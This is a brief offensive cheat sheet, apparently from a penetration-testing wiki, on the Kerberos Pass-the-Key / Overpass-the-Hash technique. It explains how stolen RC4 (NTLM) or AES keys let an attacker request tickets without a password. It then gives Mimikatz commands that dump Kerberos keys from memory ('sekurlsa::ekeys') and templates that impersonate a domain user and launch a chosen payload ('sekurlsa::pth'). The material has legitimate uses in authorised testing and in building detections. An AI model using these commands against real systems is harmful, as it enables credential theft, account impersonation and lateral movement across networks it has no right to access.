
Pass The Key

Required Privileges: Administrators

When a user requests a TGT, the client sends the KDC a timestamp encrypted with a key derived from the user's password (Kerberos pre-authentication).

The algorithm used to derive this key can be DES, RC4, AES128 or AES256, depending on the installed Windows version and the Kerberos configuration. Anyone holding one of those keys can ask the KDC for a TGT without knowing the actual password.


:: Obtaining Kerberos Encryption Keys
privilege::debug
sekurlsa::ekeys

Hash Format

RC4 [Overpass-the-Hash]

When RC4 is used, the key is equal to the user's NTLM hash.

This means that if the NTLM hash can be extracted, it can be used to request a TGT as long as RC4 is one of the enabled encryption types.


Depending on the available keys, the following Mimikatz commands can be run.

:: RC4
sekurlsa::pth /user:USERNAME /domain:TARGET /rc4:HASH /run:"Command/PAYLOAD To Run"
:: AES128
sekurlsa::pth /user:USERNAME /domain:TARGET /aes128:HASH /run:"Command/PAYLOAD To Run"
:: AES256
sekurlsa::pth /user:USERNAME /domain:TARGET /aes256:HASH /run:"Command/PAYLOAD To Run"